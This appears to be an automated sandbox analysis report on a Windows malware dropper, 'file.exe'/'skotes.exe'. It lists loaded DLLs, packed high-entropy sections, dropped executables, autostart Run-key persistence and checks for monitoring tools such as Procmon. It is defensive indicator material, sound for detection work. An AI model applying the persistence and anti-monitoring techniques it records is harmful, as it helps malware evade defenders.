Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1873920 > 1048576
Source: file.exe Static PE information: Raw size of hukqwfqu is bigger than: 0x100000 < 0x197c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c7f41aa061.exe, 0000002F.00000003.3276046785.0000000004E70000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hukqwfqu:EW;duyfafyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hukqwfqu:EW;duyfafyf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hukqwfqu:EW;duyfafyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hukqwfqu:EW;duyfafyf:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hukqwfqu:EW;duyfafyf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hukqwfqu:EW;duyfafyf:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 9_2_00406328
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 3ee5495637.exe.6.dr Static PE information: real checksum: 0x1b6206 should be: 0x1c3cde
Source: fMb18eF.exe.6.dr Static PE information: real checksum: 0x418363 should be: 0x42297a
Source: fMb18eF[1].exe.6.dr Static PE information: real checksum: 0x418363 should be: 0x42297a
Source: QwGWuQZ[1].exe.6.dr Static PE information: real checksum: 0x138e94 should be: 0x139977
Source: random[1].exe.6.dr Static PE information: real checksum: 0x2aec83 should be: 0x2ad51f
Source: 3907f97605.exe.6.dr Static PE information: real checksum: 0x1ccef5 should be: 0x1d6134
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x431304 should be: 0x43d349
Source: 779ae05f2f.exe.6.dr Static PE information: real checksum: 0x431304 should be: 0x43d349
Source: c7f41aa061.exe.6.dr Static PE information: real checksum: 0x2aec83 should be: 0x2ad51f
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x1ccef5 should be: 0x1d6134
Source: QwGWuQZ.exe.6.dr Static PE information: real checksum: 0x138e94 should be: 0x139977
Source: file.exe Static PE information: real checksum: 0x1d2657 should be: 0x1d1663
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d2657 should be: 0x1d1663
Source: random[2].exe.6.dr Static PE information: real checksum: 0x1b6206 should be: 0x1c3cde
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: hukqwfqu
Source: file.exe Static PE information: section name: duyfafyf
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: hukqwfqu
Source: skotes.exe.0.dr Static PE information: section name: duyfafyf
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name: yfiarvre
Source: random[1].exe.6.dr Static PE information: section name: kcckixnl
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: c7f41aa061.exe.6.dr Static PE information: section name:
Source: c7f41aa061.exe.6.dr Static PE information: section name: .idata
Source: c7f41aa061.exe.6.dr Static PE information: section name: yfiarvre
Source: c7f41aa061.exe.6.dr Static PE information: section name: kcckixnl
Source: c7f41aa061.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: kzyuzjct
Source: random[2].exe.6.dr Static PE information: section name: xpspqxsm
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 3ee5495637.exe.6.dr Static PE information: section name:
Source: 3ee5495637.exe.6.dr Static PE information: section name: .idata
Source: 3ee5495637.exe.6.dr Static PE information: section name:
Source: 3ee5495637.exe.6.dr Static PE information: section name: kzyuzjct
Source: 3ee5495637.exe.6.dr Static PE information: section name: xpspqxsm
Source: 3ee5495637.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .rsrc
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: ozcvkfvj
Source: random[1].exe1.6.dr Static PE information: section name: iubdojmz
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: 779ae05f2f.exe.6.dr Static PE information: section name:
Source: 779ae05f2f.exe.6.dr Static PE information: section name: .rsrc
Source: 779ae05f2f.exe.6.dr Static PE information: section name: .idata
Source: 779ae05f2f.exe.6.dr Static PE information: section name:
Source: 779ae05f2f.exe.6.dr Static PE information: section name: ozcvkfvj
Source: 779ae05f2f.exe.6.dr Static PE information: section name: iubdojmz
Source: 779ae05f2f.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: fwtvsnnj
Source: random[1].exe2.6.dr Static PE information: section name: vcdokcsv
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 3907f97605.exe.6.dr Static PE information: section name:
Source: 3907f97605.exe.6.dr Static PE information: section name: .idata
Source: 3907f97605.exe.6.dr Static PE information: section name:
Source: 3907f97605.exe.6.dr Static PE information: section name: fwtvsnnj
Source: 3907f97605.exe.6.dr Static PE information: section name: vcdokcsv
Source: 3907f97605.exe.6.dr Static PE information: section name: .taggant
Source: service123.exe.7.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Code function: 7_3_0168BA02 push ebx; iretd 7_3_0168BA21
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Code function: 7_3_0168B9C3 push edi; iretd 7_3_0168BA01
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014D75CC push eax; retf 31_3_014D75CD
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014D66F0 push eax; retf 31_3_014D66F1
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014860C8 push esp; retf 31_3_014860C9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014860C8 push esp; retf 31_3_014860C9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014860C8 push esp; retf 31_3_014860C9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01484EE4 pushad ; retf 31_3_01484EE5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01484EE4 pushad ; retf 31_3_01484EE5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01484EE4 pushad ; retf 31_3_01484EE5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147A1E8 pushad ; retf 31_3_0147A1E9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147A1E8 pushad ; retf 31_3_0147A1E9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147A1E8 pushad ; retf 31_3_0147A1E9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147CF99 pushfd ; iretd 31_3_0147CF9D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147CF99 pushfd ; iretd 31_3_0147CF9D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147CF99 pushfd ; iretd 31_3_0147CF9D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01479B18 pushad ; retf 31_3_01479B1D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01479B18 pushad ; retf 31_3_01479B1D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01479B18 pushad ; retf 31_3_01479B1D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014F0CC1 pushad ; retf 0012h 31_3_014F0CC2
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014EB4E1 push edi; retn 0012h 31_3_014EB4E2
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C539C push esp; retf 31_3_014C539D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C539C push esp; retf 31_3_014C539D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C539C push esp; retf 31_3_014C539D
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014860C8 push esp; retf 31_3_014860C9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014860C8 push esp; retf 31_3_014860C9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014860C8 push esp; retf 31_3_014860C9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01484EE4 pushad ; retf 31_3_01484EE5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01484EE4 pushad ; retf 31_3_01484EE5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_01484EE4 pushad ; retf 31_3_01484EE5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_0147A1E8 pushad ; retf 31_3_0147A1E9
Source: file.exe Static PE information: section name: entropy: 7.986304987757726
Source: file.exe Static PE information: section name: hukqwfqu entropy: 7.952987780684621
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.986304987757726
Source: skotes.exe.0.dr Static PE information: section name: hukqwfqu entropy: 7.952987780684621
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.802799345548783
Source: c7f41aa061.exe.6.dr Static PE information: section name: entropy: 7.802799345548783
Source: random[2].exe.6.dr Static PE information: section name: kzyuzjct entropy: 7.953368185260934
Source: 3ee5495637.exe.6.dr Static PE information: section name: kzyuzjct entropy: 7.953368185260934
Source: random[1].exe1.6.dr Static PE information: section name: ozcvkfvj entropy: 7.954744975540035
Source: 779ae05f2f.exe.6.dr Static PE information: section name: ozcvkfvj entropy: 7.954744975540035
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.982113095110462
Source: random[1].exe2.6.dr Static PE information: section name: fwtvsnnj entropy: 7.953020845003473
Source: 3907f97605.exe.6.dr Static PE information: section name: entropy: 7.982113095110462
Source: 3907f97605.exe.6.dr Static PE information: section name: fwtvsnnj entropy: 7.953020845003473

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\QwGWuQZ[1].exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Unit Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Rocky Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\fMb18eF[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Unit Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Rocky Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 04dc07bf76.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3907f97605.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c7f41aa061.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ee5495637.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
